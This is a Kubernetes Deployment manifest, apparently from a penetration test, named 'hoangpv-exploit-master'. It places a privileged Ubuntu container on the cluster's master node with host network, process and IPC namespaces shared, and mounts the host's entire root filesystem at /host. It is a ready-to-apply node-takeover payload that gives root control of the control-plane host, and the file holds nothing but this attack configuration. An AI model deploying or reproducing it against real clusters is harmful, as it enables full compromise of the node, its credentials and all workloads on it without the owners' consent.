apiVersion: apps/v1
kind: Deployment
metadata:
  name: hoangpv-exploit-master
  namespace: external-namespace
  labels:
    app: pentest
spec:
  replicas: 1
  selector:
    matchLabels:
      app: pentest
  template:
    metadata:
      labels:
        app: pentest
    spec:
      nodeName: k8s-master
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: hoangpv-exploit-master
        image: ubuntu
        imagePullPolicy: IfNotPresent
        securityContext:
          privileged: true 
        volumeMounts:
        - mountPath: /host
          name: noderoot
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "while true; do sleep 30; done;" ]
      volumes:
      - name: noderoot
        hostPath:
          path: /
